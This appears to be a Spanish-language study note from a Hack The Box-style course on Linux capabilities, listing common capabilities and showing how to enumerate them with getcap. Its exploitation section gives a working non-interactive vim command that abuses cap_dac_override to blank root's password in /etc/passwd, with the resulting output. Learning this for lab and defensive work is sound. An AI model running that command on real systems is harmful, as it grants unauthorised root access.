Capabilities

Las capacidades son una característica de seguridad en el sistema operativo Linux que permite otorgar privilegios específicos a los procesos, brindando un control más preciso sobre las acciones que pueden realizar los programas en el sistema. Esta característica mejora la seguridad al permitir que se otorguen permisos de manera más granular, en lugar de depender del modelo tradicional basado en usuarios y grupos.

Comando para Configurar Capacidades:

sudo setcap cap_net_bind_service=+ep /usr/bin/vim.basic

Este comando le otorga al ejecutable /usr/bin/vim.basic la capacidad de enlazarse a puertos de red, una acción restringida normalmente a los procesos con privilegios elevados.

Capacidad

Descripción

cap_sys_admin

Permite acciones con privilegios administrativos como modificar archivos del sistema.

cap_sys_chroot

Permite cambiar el directorio raíz del proceso.

cap_sys_ptrace

Permite depurar otros procesos, lo que puede exponer información confidencial.

cap_sys_nice

Permite cambiar la prioridad de los procesos.

cap_sys_time

Permite modificar el reloj del sistema.

cap_sys_resource

Permite modificar los límites de recursos del sistema.

cap_net_bind_service

Permite vincular un proceso a puertos de red.

Comando de Enumeración de Capacidades

find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;

Este comando busca todos los ejecutables en los directorios comunes y luego usa getcap para mostrar las capacidades asignadas a cada binario.

Matthewzx@htb[/htb]$ find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;

/usr/bin/vim.basic cap_dac_override=eip
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep

Explotación

Cuando se obtiene acceso con una cuenta con privilegios bajos, puede encontrarse una capacidad como cap_dac_override en un binario. Esta capacidad permite al binario omitir las verificaciones de permisos en archivos y realizar cambios en archivos del sistema. Un ejemplo sería:

Matthewzx@htb[/htb]$ getcap /usr/bin/vim.basic

/usr/bin/vim.basic cap_dac_override=eip

Con esta capacidad, un atacante podría modificar archivos como /etc/passwd para escalar privilegios y obtener acceso root sin necesidad de contraseñas, por ejemplo:

/usr/bin/vim.basic /etc/passwd

También podemos realizar estos cambios en un modo no interactivo:

Matthewzx@htb[/htb]$ echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd
Matthewzx@htb[/htb]$ cat /etc/passwd | head -n1

root::0:0:root:/root:/bin/bash

PreviousEscalada de privilegios basada en permisos NextEscalada de privilegios basada en servicios

Last updated 1 month ago